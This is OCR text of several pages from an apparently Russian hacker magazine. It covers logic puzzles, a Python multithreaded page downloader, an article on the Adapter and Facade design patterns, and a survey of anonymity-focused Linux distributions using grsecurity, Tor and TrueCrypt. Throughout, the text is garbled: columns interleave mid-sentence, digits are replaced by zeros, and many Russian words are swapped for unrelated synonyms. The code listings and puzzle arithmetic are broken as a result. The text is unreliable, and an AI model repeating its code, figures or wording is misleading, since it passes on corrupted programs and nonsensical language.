УСЛОВИЕ Написать скрипт, считывающий наличность URL изо файла !одна строка - насчёт дин URLI, скачиваю суп й их никак не сильнее нежели во N потоков равно сохраняю­ щий каждую не без; тр аницу на отдельном файле.

N, из-за д аваемое аргумен­ 10. Имена конечных

0. 3. 4.

фолиант командной строки, п относительно обмол ч анию так же

Ждем неко тор ое время, п ока поверхностьлампочки нагреется. Выключаем э т у лампочку. Включаем второстепенный отключатель равно вперед во другую комок нат у смотреть на лампочки.

файлов значения малограмотный имеют. Для реализации многопоточности использо вать сверху альтернатива по отношению дн у с стандартных библиотек thгeadiпg , eveпtlet, geveпt,

Twisted

иначе любую другую з возьми комую тебе библио ­

Итого имеем: ради ту лампочку, которая горит, отвечает только лишь который

сработанный отсоединение !второй]. Трогаем выключен ны е лампоч­ ки. Теплая лам поч ка включается от п омощью первого выключат еля .

теку.

А та, которая безвыгодный г что касается рит равным образом хо л по отношению дная , - не без; вспоможение ю третьего.

РЕШЕНИЕ Я далеко не стал одиноко щеголять да реализовал скрипт вместе с использо на а­

УСЛОВИЕ

нием осанка дартн ой thгeadiпg:

В одной бутылке литр вина, во др угой литр воды. Из первой кайфовый вторую перелили ложку причина , а кроме изо другой на п ервую перелили ложку

import import import import

получившейся смеси. Чего тепер ь больше: воды на бутылке из вином

sys threading Queue urllib2

alias преступление на бутылке вместе с водой? Вино равным образом вод у безграмотный перемешивали.

РЕШЕНИЕ Для большей наглядности возьмем ложку содержащий в себе

#

Класс

потока,

скачивающий

страницу

class DownloadThread(threading . Thread): def run(self): #

Прописываем хидеры пользу кого

headers

=

I

=

000

мл

первопричина

0еее мл воды

+

0ее мл первопричина

I

бутылка:

000

II

бутылка:

0еее мл воды

мл

первопричина

+ 0ее мл смеси + 0ее мл первопричина -

0еемл смеси

страницы

urllib2.Request(urlsPool .get(),None,headers)

Пишем во порознь взятый обложка

Выдаем справку,

После второго переливания:

б.е)' }

logfile.write(urllib2.urlopen(req).read()) logfile . close() #

П о­

{ 'User-Agent' :

Запрашиваем предмет

req #

бутылка:

п бутылка:

запроса

'Мozilla /4 . 0 (compatiЫe; МSIE 0.0; Windows NT while urlsPool.qsize() > е : logfile=open(str(urlsPool.qsize()), ' w' )

#

000 мл.

сле первого переливания имеем:

разве скрипт запущен без участия аргументов

П олучается, ч так на смеси 00 частей воды равно 0 пакет преступление или — или же 100/11 мл инструмент равным образом 0000/11 мл воды . С учетом сего перепишем послед­

нее отражение !позволю себя убрат ь «МЛ» к большей компак т­ ности ]:

I

бутылка:

if len(sys.argv) < 0: print 'Usage : downloader.py [-n <number >] FILE \ n\ "- n <number>" - number of threads (default 00)' sys.exit( 0)

п бутылка:

I

бутылка:

#

II

бутылка:

Обрабатываем правдоподобный довод со

счетом nотоков

if len(sys.argv)==4 and sys.argv[ 0] threads int(sys.argv[ 0]) else : threads 10

==

(9ее (1еее

+ 000/ 01) инструмент + 0000/ 01 воды - 0000/ 01) воды+ (1ее - 00/ 01)

проступок

П осчитаем дроби:

009,09 909,09

преступление

первопричина

+ 00,91 + 00,91

воды

воды

'-n ' : Как видно, состав во бу сторона ках оди н ако вая ! Но зто позволительно бы ло понять да неизмеримо не задавайся : подумай, чай количество жи д кос т да на бу сторона ках в итоге остался одинаковым - в рассуждении дин литр, а значит, равно самочки смеси

должны состоять одинаковыми. ::Х:

ХАКЕР

03 /158/ 0012

099


КОДИНГ

МЕНЯЕМ

ИНТЕРФЕЙСЫ КЛАССОВ БЕЗ УЩЕРБА ДЛЯ ЗДОРОВЬЯ

deeonis [deeonislagmail.com[ ·

а на ай представ им, ч т относительно сколько-нибудь полет обратно ты да я написали

неведомый парсер, кто собирает опре д е л е нн ую инфор­ мацию со нужных сайтов. Дляп арсинга НТМL- стра н равным образом ц мы использовали стороннюю библиотеку, ко так раиса тут-то относительно тл ично справлялась со своими задачами. Но в т п рошло некоторое время, и не без; т арый заказчик, пользу кого которого я соз д разве н а ш чуд об -п ро д укт, ре ­

шил напомни т ь касательно себя равным образом сообразно п росил давно бавить парочку-другую н что до ваш брат х функций . Мы из задором взялись ради работу, только положительно за единый вздох по­ няли, почто публичка чтобы разбора НТ М L- ко д а еще д ав же побег т аре л а и отнюдь не поддерживается. Зато на открытом доступе глотать род не без; кучей свистелок равно блестяшек, каковой для тому но работает быстрее равно вместе с т а­ бильнее. Н по отношению поглощать одна проблема- ан т ерфейсы у классо на нов ой

Разработка да обеспечение большинства систем

библиотеки п ол н остью отличаю т ся ото тех, которые м ы использо­ вали ранее. Более того, многие методы из та рого НТМL-дв ижка

принято на прохождение многих лет. Кодовая устои

безграмотный имеют анало г ов во новом. Нет, совершить ч т касательно -т об п одобное можно,

растет вроде нате дрожжах, а взаимосвязи в лоне

побить плод их работы. Всё сие бери на касательно дит получи и распишись мысль, ч т об

компонентами программнога обеспечения

подложить туман у новы х фич если т отнюдь не та для п росто, на правах для м сие показа­

становятся всё сложнее равно изощреннее. Зачастую при обновлении отдельных участков стих предварительно

программистами встает заморочка рефакторинга всего проекта до отказа . Для того в надежде этого избежать, создан паттерн « Адаптер», относительно котором мы нынче равно поговорим .

000

так ради сего н ужно вытребовать мало-мальски функций да как следует

олень вначале. Однако, таково во вкусе пишущий сии строки п роек т ирова ли наше прил ожение в 00 -стиле, нам получи поддержка придет паттерн <<Ада пт ер», ко т орый избавит нас с переписывания кучи старого стих .

ПАТТЕРН «АДАПТЕР» Чтобы взять в толк , на правах работает отечественный мессия ный паттерн, до­

статочно вообразить какой- н ибуд ь п ерехо пора к, например, для элек т ро пр иборов изо С Ш А, который-нибудь п эскер на об ля е т посадить бери кол ш татовскую вилку во е вр опейскую розетку . Пр ограммный трансформатор д е ла ет при-

ХАКЕР

03/158/2012


Паттерны «Адаптер>> да «Фасад>>

мерно в таком случае но . А ежели конкретнее, так некто преобразует единственный интерфейс

puЬlic

IHTMLParser

вызова на второй . Единственная его окончание - свершить так, чтобы клиент никак не заметил, что такое? возлюбленный обращается нисколько ко дру г ой библиоте­ ке, равным образом тем самым избежать трудоемкой равно на какой-то степени ажно

private : ModernHTMLParser &m_modernParser;

опасной процедуры изменения кода.

puЫic :

Д ля введение дайте взглянем в то, в чем дело? у н искусник было раньше.

HTMLAdapter(Modern HTMLParser &parser) { m_modernParser=parser;

Наша програ~а на первой версии (используется устаревшая библиоте ко а с целью парсинга

0/

HTML)

}

Интерфейс парсера

char * get Tags() {

01 . ..

class IHTMLParser

m_modern Parser.getHtmlTags();

{

01 . .•

01 char * getтags ()

};

е·

'

01 ...

/1

}

/1

Класс,

р еализующий

class HTMLP arse r :

равным образом нт ерфейс

puЫic

/ / Кл ие нт ский код ModernHTMLParser &modernParser=new ModernHTM LParser(); I HTMLParser * parser=new HTMLAdapter(modernP arser); parser->getTags();

IHTMLP arser

01 char * getTags() // Р еализация

метояа

Клиентский шифр неграмотный претерпит по существу никаких изменений.

};

Н у, аль аюшки? придется организовать мира класса HT M L Adapteг равным образом пере­

01 } // Клиентский код IHTMLParser *parser parser->getTags();

вручить ему на качестве параметра ссылку получи и распишись Моdегп НТ МL Р агsег. Используя композицию,тоестьпередаваяобъектадаптируемого класса до ссылке, автор сих строк повышаем общую покладистость системы .

new HTM LParser();

В общем случае шифр адаптера может переменять результа­ ты, получаемые ото адаnтируемого класса. Так, если, например, ме­

Как автор сих строк видим, тогда всё изрядно просто. Е сть энский ранг

тод getТagsll класса НТМ L Рагsег возвращает конгломерат НТ М L-тегов,

Н Т МL Р агsег, реал да зующий соответст на ующий интерфейс. Клиент­

используемых во разметке страницы, а ме т од get Htm iTagsl l класса

ский шифр создает объек т, ко т орый поддерживает э т что до т ан т ерфейс,

ModeгnHTMLPaгseг возвращаеттоже самое, только на виде вектора, так

а после обращается для его разнообразным методам. Но об эту пору

проведение в жизнь метода getТags во HTM L Adapteг создаст сосредоточение нате осно­

у нас принимать ModeгnHTMLPaгseг, тот или другой хоть твоя милость что-нибудь хочешь никак не поддерживает

ве полученного ото новой библиотеки вектора.

IHTM L Paгseг. Д ля того дабы переправить настоящий недочет, ты да я создадим класс, кто короче содействовать IHTMLPaгseг, быть этом деле г и­

Изменение результатов работы адаптируемого класса

руя действие его методов н овой библиотеке . Этот новоизобретённый разряд

class HTMLAdapter (Moder nHTMLP ar ser &parser): puЫic I HTMLParser

истанет а д а п тером.

Адаптер интересах

ModernHTMLParser class ModernHTML Parser

private : ModernHTMLParser &m_modern Parser; puЫic :

HTMLAdapter(ModernHTMLP arser &parser) { m_moder nP arser=parser;

01 std ::vect or <char *> getHtmlT ag s ();

01 . . .

char *

01

Адаптер,

р еализующий

I HTMLPa r ser class HTMLAaa pt er (Mode rnHTMLP arser &pa rs er):

CLIENT

getтags ()

0/ .. .

равным образом нтерфейс

vectorOfTa gs

m_modern Parser.getHt mlTags();

TARGET

0

+request!l

r_

0

Adaptee -> specificReqest []

0

ADAPTER

0

+request(]

0------

-

«ad aptee»

.. ADAPTEE

specificReqest 01

Д равно аграмма классов nаттерна « Адаnтер »

ХАКЕР

03/158/ 0012

001


КОДИНГ

// Преобразуем градиент на массив return vector2array(vectorOfTags);

char * getTags() { // Тут всё проще, этак в духе пишущий сии строки наследуем способ getНtmlTags (),

};

/1

IJ

vectorOfTags=getHtmlTags();

Jl

ведь не запрещается потребовать его наnрямую

Преобразуем ве для тор на скопление

return vector2array(vectorOfTags);

};

Е сли твоя милость точный заглядыв аеш ь на рубрику << Кодинг », то, на­

верное, помнишь др угой родственный паттер н, а вот поэтому и есть « Де коратор>>.

Jl ...

На узловой созерцание фактически может показаться, аюшки? по части сути эти двушник шаблона объектно - ориентированного пр ограммирования Конечно, используя юниорат награду композиции, я теря­

идентичны. Но возьми самом дел е паттерн «А даптер >> служит пользу кого пре­

образования одного ан т ерфейса вызова на другой, во в таком случае минута равно как

ем некотор ую эластичность равным образом ограничиваем себя всего лишь одним классом

« Декоратор >> призван мо ди фицировать результаты, выдаваемые

НТМLРагsег, а за получаем дивиденд во производительности .

методами поддерживаемых классов.

Если бы пакет создавала мн ожес тво объек т ов HTML Adapteг и усиленно работала вместе с его методами, то, используя трансформатор объ­

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ

ектов, автор бы тратили лишнюю мнема равным образом теряли минута рядом вызове

Выше да мы со тобой рассмотрели этак называемый а дап тер объектов, ко т орый

его методов равным образом сохранении инкапсулированного НТМLРа гsег. С др у­

ада пти рует интерфейс п у т ем композиции соответствующего объ­

нееврей сто роны, кабы бы у сверху от бы л н екий ранг НТМLРагsег 0, какой-никакой

екта да передачи ему н стрела-змея ны х вызовов. Н в отношении глотать покамест одинокий лик такого

бы в свой черед реализовывал интерфейс IH TMLPa гseг, нам пришлось бы

паттерна-это а даптер ко ла ссов. В лента через а дапт драчун объектов,

nисать с целью него новоявленный код.

плата классов испол ь зует множественное наследова н ие, что такое?

капелька у прощает его реализацию да уско ряет работу.

« ФАСАД » Теперь , если пишущий сии строки важнецки разобрались на паттерне «А даптер >>, можно предпринимать другим модель ом объектно-ориентированного

Адаnтер классов

class HTMLAdapter (): puЫic HTMLParser,

программирования по-под названием «Фаса д >>. Технически « Фасад >> puЬlic

ModernHTMLParser

всего ничего нежели отличается с «А даптера >> . Чтобы на этом убедиться, давай взглянем бери код.

puЫic : Паттерн

using

Syз~em ;

namespace

«Фасад>>

class SystemClassl { void methodA() ;

Adap~e~

01 .. .

{

} class MainApp class SystemClass2

static void Main () (

void methodB();

01 Create adapter and place а request Target ~arget=new Adapter () ; target .Request (); 11 Wнt for user Console . Read ();

01 . ..

class

SystemClassЗ

{ void methodC ();

/J . ..

01 "Tarqet" class Target

class Facade (SystemClassl &scl, SystemClass2 &sc2, SystemClassЗ &sсЗ)

( puЬlic

virtual void Request ()

( Console . 0Jп.teLine ( "Called

Target

Requeзt()") ;

01 "lldapter"

private : SystemClassl &m_scl; SystemClass2 &m_sc2; SystemClassЗ &m_scЗ;

class Adapter : Target puЬlic :

(

private Adaptee adaptee=new Adaptee (); puЬlic

override void Request ( )

Facade(SystemClassl &scl , SystemClass2 &sc2, SystemClassЗ

(

01 PossiЫy do sоме othm· м:~rk 11 and then call Spec~f~cRequest adaptee . SpecificRequest ( );

01 "Addptee"

m_s cl m_sc2

scl; sc2;

m_ scз

sсЗ;

&sсЗ)

void method()

{ Пример стих nаттерна « Адаnтер» получи и распишись С#

002

m_scl. methodA ();

ХАКЕР

03/158/2012


П а тт ер н ы <<А д а пт е р » равно << Ф аса д »

All the complexity of this entire sub-system is encapsulated in а single wrapper class and it's simple interface ------------------т------------------

SubsystemOne SubsystemTwoWгappeг

+primeTheDirectivell

SubsystemThгee

/

Holodeck

PlasmaConduit

WагрСоге

JeffeгiesTube

0 DilithiumChambeг

Weapon

t Тгаnsрогtег

TuгboLift

PhaseгBack

PhotonToгpedo

Диаграмма классов паттерна ссФасад•>

m_sc2 . met hodB() ; m_sc 0. meth odC () ;

стему . <<Фасад>> но инкапсупирует весь сии образ действий во одном своем методе, зачем сво д ит всю процедуру для вызову одной-единственной функции равно тем самым упрощает клиенту век . Е сли прово д ить

'

аналогию от П К , в таком случае <<Фаса д >> - сие кнопочка включения ноу т бука.

}

Более того, п а тт ерн <<Фаса д >> позволяет клиенту обращаться Класс

Fa cade,

таково но вроде равно HT M L A d a p te г, п ринимае т во каче ­

ко любому классу сис т емы бери п рямую, возьми низком уров н е, благода­

стве движение р аметров своего конструктора ссылки держи объекты. Только,

ря чему сохраняется все податливость да мощь сих классо на . О д зарабатывать

во награда ото <<Адаптера>>, сих ссылок неско ль ко . Д алее <<Фасад>>

ко, если бы потребитель знает токмо интерфейс <<Фасада>>, на будущем

определяе т н есколько ме т в рассуждении д касательно во , ко т орые обращаются для функциям

наша сестра можем видоизменить систему классов, обслуживаемых

инкапсулиро во анных объекто во . Всё без затей равным образом оче н ь очень может быть нате п ат­

Facade,

терн <<А д аптер>> . Н относительно ц ели у сих д вух ш абло н ов соверше нн по отношению разные.

полезна.

равно рядом этом безвыгодный выменивать шифр клиента . Такая карантин жуть

Если НТ М LР а г sе г п р е д назна ч е н про п ри во е д е н ия од н ого интерфей­ са ко другому, так

Facade

у п ро щ ает интерфейс доступа ко далеко не которой

ЗАКЛЮЧЕНИЕ

системе классов . В рядом во еденном перед этим примере наш брат инка псулируем

Мы узнали насчёт д вух новых паттернах: <<А д аптере>> равным образом <<Фаса -

одновременно мало-мальски объектов, принадлежащих ко разным типам да со­

де>>. Первый позволяет свободно дать толчок равно н терфейс

ставляющих незнакомый комбинация ко л ассов, какой служит для того выполне ­

одного класса для интерфейсу д руго г касательно для того быстрой адаптации

ния каких-либо опре д е л енных д ейс т вий . Ч тоб ы паче себя сие

клиентского стих для новым компоне н немного погодя системы. Ш аблон

п ре д ста на да т ь, д остаточно вс п ом н ить ста р ый д обрый П К со систем­

00- п ро г рамми р ования <<Фаса д >>, беда п охожий н а <<А д а п тер>>,

ным блоком, монитором, танец н ками равным образом прочей периферией. Дл автор

служит к всецело непохожий цели - у п ро щ ения д оступа

запуска сего компьютера нам нуж н относительно нажат ь кнопку питания получай си­

ко определенным интерфейсам.

стемном блоке, включит ь монитор, колонки да т. д., в таком случае лакомиться потребовать

воз функций классов, которые купно образуют некую си-

ХАКЕР

03/158/2012

В мире объектного кодингасуществует единаче мно г что касается разнообраз ­ ных паттернов, что до которых моя особа расскажу на будущем. :х:

003


UNIXOID

Гена Зобнин [ e xe cЬit. r u l

изоляцию ИЗ ЧЕГО СОСТОЯТ БЕЗОПАСНЫЕ LINUХ­ ДИСТРИБУТИВЫ Когда тост заходит в рассуждении создании операционки, способной покрыть безымянность пребывания

-

Разработчики безопасных дис т рибутивов избегают использовать

ТгuеСгур t, приблизительно в качестве кого

его разработка ведется держи ба з е за ко рытой модели, из-за ась? обитать

энциклопедичный аудит кода не мочь .

Во промежуток времени каждой

во Сети, надежность сохраненных держи диске

загрузки Наvеп

данных равным образом даровать остальные собственность

« годы •)

проверяет

защиты , дистрибутивастроители оказываются

дистрибутива в дня х, прошедших

со момента

держи обалдайс плодовитыми держи идеи

установки .

равным образом неординарные решения парнями . Эти м

Разработчики не рекомендуют

истощить

разработкам, простым равным образом сложным , гениальным

дистрибутив,

равно спорным, равным образом посвящена данная статья.

ДОСТИГ

чьи года которого

000 ДНеЙ .

l:iфl!lilillli

д истрибу т да ваш брат что касается т во злом щ иков , что до д хотя вр еме нн об

М н огие хакеры, считаю щ ие себя эксперта-

п вал на в рассуждении л моя персона пишущий эти строки сохра н ит ь ванька-встанька обство равно п ростоту во ис­

ми на без п асности общей сложности равным образом на ся, на свое пора

п относительно л ьзова н ии . Ч тобы неграмотный вслед п у та т ь чита т е л я, ваш покорнейший слуга

брались ради созда н ие п о-нас т оящему защи щ ен ­

разбил э т равным образом т ех н ологии возьми высшая отметка групп :

ны х равным образом предлагающи х п олную неизвестный н отросток ОС.

заплатки , сообразно умолчанию наличка по отношению жен н ые нате кер ­

которые действи т ельно показали мироздание у, получай ась?

нел.

способны. Не будем д елать н авевающий тоску

цен т рируемся получи и распишись самых гла вн ых т ех н ологиях в их арсенале , ко т орые н а д ежно из-за щ равным образом щ ают сии

равно следовать п ут ы ван равно мы т ех, ко т по части пытает от автор е го получай й ти .

Защита д а н ны х . Описани е не без; соответственно от обов , не без; п по части ­

Д есктоп. Н абор д осту п н ы х п риложений, а как и методики , п рименяемые для того защи т ы

Я д ерные д е л а, а точнеепатчии крат л ичные

Многие изо них потер п е л равным образом провал , за всем тем безграмотный ­

освященный традицией сообщение д ист р иб у ти на в рассуждении на , а скон ­

зуе наша сестра х дл автор этих строк обез лич равно во а н равно ваш покорнейший слуга пользов а т е ля

ото пос т оронних наблю д ате л ей .

Различные ан т ересн ы е фу ш ки. Итак, окунемся на общество муть а н ои д а л ьной

мо щь ю которых дости г ает не без; ваш покорный слуга безопасност ь

секьюрности равным образом рассмот р им сле д ую щ ие д ис­

сохра н е н утнапиштим получи д иске /флешке да н фо р ма ц ии .

т рибутивы : Ubuпt u Pг i v acy

Анонимиза ц ия .Н абортехноло г ий,испол ь-

Haven

P гoject,

Tails

Re mi x, Pгi v a tix, The Li nux.

да L ibeгte

ХАКЕР

03/158/20 02


Свобода чрез изоляцию

ЯДРЕНЫЙ ТУКС

дога приложения получи и распишись отдельной виртуальной

Чтобы содеять туке по-серьезному безопас­

машине. Смысл такого перегруза заключается

утнапиштим ОСью, неграмотный быть сверх допиливания ядра,

во тотальном разделении приложений, этак что-нибудь

а точнее, его патчин га чтобы повышения общей

аж если бы взломщику каким-то чудотворно удастся

стойкости ОС. Водан изо традиционных методов,

выдвинуть близкие услуги перед суперпользо­

используемых на преимущества этой цели,

вателя равным образом из-за гр узить на главное собственный код, уязвимым

заключается во наложении возьми сердечник патч ей

будеттолько одно приложен равным образом е, беспричинно что каждая

проекта gгsec:uгity. Они обеспечивают защиту

виртуальная устройство работает перед управлени­

с возможных вторжений из через множе­

ем собственного ядра. Такой зубодробитель­

ства методов, промежду которых табу перехода

ный манера защиты используется во дистри­

по мнению ссылкам, неграмотный принадлежащим пользовате­

бутиве

лю, экзогамия чтения

была посвящена отдельная сочинение !« Младенец

dmesg

с целью всех, который никак не име­

ет прав гооt, дополнительные ограничения ради

QubesOS,

которому на нашем журнале

из собой убийцы>>,

][_07_2010].

сhгооt-приложений, заказ чтения

/ргос, хэширование адресного пространства и стека ядра да многое другое. Мы сейчас писали

Процесс загрузки

Liberte

НЕДОСЯГАЕМЫЕ БАЙТЫ

относительно gгsecuгity [статья <<Термоя дерный синтез»,

Защищенность личных данных пользовате­

опубликова нн ая во октябрьском номере следовать

ля- сие вторая важная признак лю-

во какой приглянется миг допускается удалить, на результате

баталия безопасной ОС. Многие дистрибутивы,

почему порядок вернется для исходному послеуста­

предназначенные к анонимизации юзера

новочному состоянию.

0010

год], приблизительно ась? неграмотный буду повторяться. Обычно с от gгsecuгity во систему

данных пользоват е ля вид растет, хотя его

устанавливается единаче равно РаХ, каковой ограни­

на Сети, обеспечивают ее не без; через спосо-

чивает путь ко страницам памяти процессов

ба, что оператор изо известного анекдота

сверло инструментов интересах вместе с оздания зашифрован­

!например, делает секция данных недоступ­

назвал бы ампутацией нен у жного органа .

ны х файлов да каталогов . Чаще всего делов ради сего

ным интересах исполнения], что-то позволяет встать сверху защиту

Такие дистрибутивы распространяются во виде

системные процессы с многих ошибок пере­

LiveCD,

который, ажно буду чи установленным

Многие системы как и включают на себя держи ­

исп по отношению льзуется выдающийся инстр у центурион ТгuеСгурt с удобным графическим интерфейсом. Напри­

полнения буфера. Этот аспект используется

сверху флешку, сохраняет весь причина пользова­

мер, дьявол входит на Наvеп l www.haven-pгoject . oгg ].

во Libeгte Liпux, каковой построен в основе

теленок бери RАМ-диске , уничтожаемом в сезон

Однако порой разработчики дистрибутивов

ядра Haгdened

перезагрузки.Спосо~ конечно, действенный,

прибегают для больше изощренным решени-

да жирно будет грубоватый .

ям. Дистрибутив Pгivatix охватывает во себя

Gentoo, еще

включающему

на себя пара патча . Другой подходец заключается на использова­

нии системы

SELinux

иначе АррАгmог смешанно

Более любопытный проект состоит вис­ пользовании шифрованного хранилища

инстр у легавый шифрования съемных носителей UsbCгyptFoгmat равным образом утилиту пользу кого резервного

из двумя упомянутыми впереди патчами !или

получи и распишись базе ТгuеСгурt иначе LUKS/dm-cгypt, которое

копирования шифрованных томов CгyptBackup

где бы них, хотя сие глупость] . Эти системы

расшифровывается в времена загрузки потом

собственной разработки. В плане поддержки

принудительного контроля доступа позволя­

ввода пароля. Благодаря современным на­

прозрачного шифрования данных особенно

полуют врубать приложения во изолированном

работкам провести в жизнь такую систему аспидски

окружении, круглым счетом зачем отлаженность !читай взлом] одного

просто, тем сильнее зачем симпатия во готовом виде

примечателен дистрибутив Ubuntu Pгivacy Remix lwww. pг i vacy-cd . oгg ], организованный к

с них неграмотный повлечет следовать с лица проблем во других.

присутствует во дистрибутивах

работы на локальном окружении, минуя доступа

Подход не без; использованием АррАгmог реализо­

равно многих других . Она опять же нет переводу во дис­

ко козни lзадействование LAN/WLAN/Biuetooth

ван во операционке

трибутивах

запрещено]. В его арсенале как не быть фронт-энд

явлениям ее создателей, гарантирует полную

TailsiThe Amnesiac lncognito Live System] да Libeгte Linux, притом на последнем

изоляцию приложений корешок ото друга.

во качестве хранилища используется крипто­

руемый вместе с

ванный представление диска, находящийся на отдель­

зашифрование , производить подписи равным образом генери­

ном каталоге. По мере дневной журнал на него личных

ровать ключи не без; через контекстного карта

quantOS,

которая, в соответствии с за­

Еще побольше кардинальный турне заключается в применении гипервизоров пользу кого запуска каж-

Ubuntu,

Fedoгa

собственной разработки чтобы

Nautilus

GnuPG,

интегри­

равным образом позволяющий совершать

lв Наvеп те а функции выполняет сбруя

Seahoгse]. Также дистрибутив использует так называемые расширенные ТгuеСгурt-тома

lв собственной терминологии авторов проекта] для сохранения данных, накопленных пользо­

вателем кайфовый миг работы !например, настройки приложений, словник

OpenOffice,

ключи GпuPG

да т. д.]. Всё сие работает прямо да неграмотный требует каких-либо дополнительных действий со сто­ роны пользователя.

Кроме систем шифрования, дистрибути­

ваш брат могут заключать в себе на себя вспомогательные инструменты, которые помогают таить

равно прикрывать информацию ото посторонних. На­

пример, во укомплектование приложений Tails входит ин­ струмент МАТ l mat.boum . oгg ], тот или иной удаляет метаданные иэ файлов различных форматов

!изображений, документов равным образом т. д.], с целью того чтобы выключить иэ них все упоминовение об ав­

_

Remov.able media can Ье disco м ected now. Before dtsconnecting. make sure that any 0/0 activity on the device has stopped.

торе.

Haven

имеет сызнова паче интересные воз­

можности, например, спирт позволяет шифровать содержимое грудь обмена на безраздельно клик, что можно пустить в дело к быстрой передачи

Liberte Linux собственной nереоной

ХАКЕР

03/158/ 0012

малого объема данных [скопировал строку-

005


UNIXOID

Congratulations. Your browser is configured to use Tor. Pluse ntlar to the ~ COf" l'urther inform.~tion aЬout using anonymously.

Тог safaly.

You &re now

fnМ

to Ьrowse the ln temet

.....

-·-;",..-;.., _.,. _ _ ••••a.u.m.11

__ . ~

....

liiiЬ

...

::".:'~:.:"..:·~:" ~

-.II~~.....W...-..L!Iai..МU....J.J.iU8~~~11111.1W.

floiSI8ofll~llllrllo~ Doo .IIOitiaweWмe

0 ttrrl!w ' w--~

Рабочий табльдот Haven 05

The Amnesiac lncognito Live System

нажал получи курсор во трее- вставил на письмо).

аппаратура равно может сморозить его на случае сбоя alias

плане

Менеджер файлов

по части недосмотру разработчиков приложения.

всё, что такое? всего лишь не запрещается изобразить , беспричинно по образу их

Nautilus,

умещающийся во оный

но дистрибутив, оснащен плагином , тот или другой

П оэтому на Libeгte

Linu x применяется

новый

Ta ils,

во кто разработчики пихают

безвыгодный смущает немалый широта дистрибутива. На­

предназначен к << полного >> удаления файла

подход: совершенно входящие во дистриб утив сетевые

пример, во него входит графичный фронт-энд

при помощи контекстное меню. Перед удалением

приложения настраиваются для работу при помощи Тог

в целях Тог-клиента

обложка забивается случайными данными, этак почто

lприложения, н е умеющие сидеть со прок-

Vidalia lwww.toгpгoject . oгg/ pгojects/vidalia l, что позволяет запускать/

ни единодержавно приспособление восстановления данных

си, запускаются от через обертки toгify), а

мешать Тог-демон, просматривать

далеко не сможет его найти.

стена запрещает любые исходящие сое ­

состав прошедшего чрез Тог трафика,

динения. Та кая карта позволяет избежа ть наравне

мо н иторить собственность д емо бери равным образом т. д.

АНОНИМУСЫ ИДУТ

прибыль IР-адре са, т ак равным образом установления внешних

Дистрибутив заключает на от ебя три расши­

Обеспечение анонимности пребыв ания

соединений на патрулирование Тог. Пр да этом разрешены

рения к браузера Fiгe fox, обеспечиваю суп е

на интернете-третья важная свое лицо

исключительно от л е д ую суп е типы внешних соединений:

защищенность веб-серфинга: развертывание

безопасного дистрибутива. Как да во случае

DНСР-запросы равным образом Тог-соединения судален ­

вместе с защитой данных, кой-какие дистрибутивы

ными НТТР IS)-портами;

получи веб-странице энергический контент что-то

подходят для решению сего вопроса радикаль­

ответы в piпg близ ограничении их количе ­

JavaScгipt-кoдa,

но. Например, Ubuпtu Pг ivacy

ства во секунду;

FiгeGPG l getfiгegpg.oгg ), позволяющий при­

никак не позволяет вылезать во Сеть , во фолиант числе

созда нны е пользователем VРN-соедине н ия;

разменивать gрg-операции ко любым элеме нт ам

через

соедине ния , инициированныеспециаль­

веб-страницы, возьмем , подписывать или — или

ным <<небезопасным браузером», каковой

зашифровывать уделенный место текста;

удалена изо ядра Liпu x, чт в отношении позволяет пре­

используется для того регистрации на точках

растягивание НТТР S Eveгywheгe lwww. eff.oгg/

вратить колтун пьютер на такого рода бастион, тот или иной

доступа.

Bluetooth

Remix

общо

равным образом даже если И К-модуля.

Поддержка просто-напросто сего хозяйства спецом

toгbuttoп, ко т орое блокирует содержащийся

Flash

равным образом т. д .; инструментарий

не грех эксплуатировать чтобы спокойной работы с важными секре тными данными .

Др угое дело- дистри бутивы, во которых из­

П ере дава емые по мнению

DHCP документация

возле этом

чрезвычайно урезаются, а перенос имени хоста,

да

0Pv4LL блокируется.

Ч тобы обеспечит ь

первично предусмотрена во озможность выхода

ARP

во Сеть . В них анонимност ь обеспечивается

неофициальность работы на локальных равно

Wi-Fi-

вместе с через во всех отношениях известного инструмента Тог,

ceтяx, применяются рандомизаторы МАе­

кой пробрасывает сращивание чрез

адресов. В некоторых дистрибутивах они

пропасть сетевых узло во , где-то зачем его и концы в воду

дост у пны на виде опции, при всем том во Lib eгte Liпux

оказываются неплохо спрятаны. В обычной

М АС-адрес генерируется подвижно в

ситуации Тог прикидывается стандартным

промежуток времени загрузки.

WINDOWS При установке сверху флешку дистрибутив

прокси, нате работу от которым необходимо нас тро ить браузер равно др угое ПО . Н что касается как бы составлять во ситуа-

ОБМАНКА ДЛЯ ~ ПОЛЬЗОБАТЕЛЕИ

Наvеnnроделываетодининтересныйтрюк

СУРОВОЕ ЛИЦО

от таблицей разделов, вследствие которому

ции, когда-когда посредством Тог необ хо димо пробросить

Е сли базарить в отношении поль зовательском интерфейсе

заурядный абонент

целиком и полностью вс е сое динения , где-то в надежде ни что касается дн в рассуждении

ди ст ри бутивов пользу кого анонимусов, так з десь совершенно

выискать систему нате брелке. Дистрибутив создает

с них н е утек л касательно во Сеть обходным путем?

весть пр озаично: вместе с тандартны е сре ды Gпome,

доnолнительный nустой раздел размером

Д истрибутивы

Ta ils

равно На vеп решают эту

проблему беда просто: брандмауер пере­

LXD E другими словами Fluxbox,

сверток стандартных прило­

жений что-то Fiгefox,

claws-mail,

AЬiwoгd да т. д.,

000

Windows

отнюдь не сможет аж

Мб на начале адресного nространства,

а саму ОС равным образом пользовательское область

направляет всегда соединения получи и распишись Тог-прокси,

выгода рыцарственный подбор ПО на ведения

размещает на следующих разделах .

помимо любые прибыль траф ика во отвод

скрытой деятельности . Он-то нас равным образом интересует.

<< далеко не видип> другие разделы, nозтому

<<анонимной сети». Однако формирователь Libeгte

Н екоторые стандартные приложения про

Windows

nользователю nокажется, почто нате флешке

Liпu x предупреждает, ч т об этакий упрощенство тео­

безопасного времяпрепровождения автор сделано

синь порох нет, а ее формат составляет

ретически небезопасен, где-то наравне , инициируя

рассмотрели во предыдущих разделах, насчёт дн ако

nущей убедительности на данный раздел дозволяется

крепление традиционным п у т ем, применение

получи них инвентарь интересных софтин, да же,

набросать разных документов, а пользу кого отвлечения

получает информацию в отношении внешн ем IР-адресе

малограмотный заканчивается . Особенно любпытен во э т ом

внимания- nорнографических картинок.

006

000

ХАКЕР

Мб . Для

03/158/2012


Свобода посредством изоляцию

https-eveгywhe гe l, принудительна переклю­ чающее браузер получи и распишись контрафакция протокола

Eile f.dit ~ew .Q.o jlookmarks Jools Y[indow J:!elp Г'

НТТРS, разве сайт его поддерживает.

Те но расширения идут во комплекте из дис­

NewTab

Back

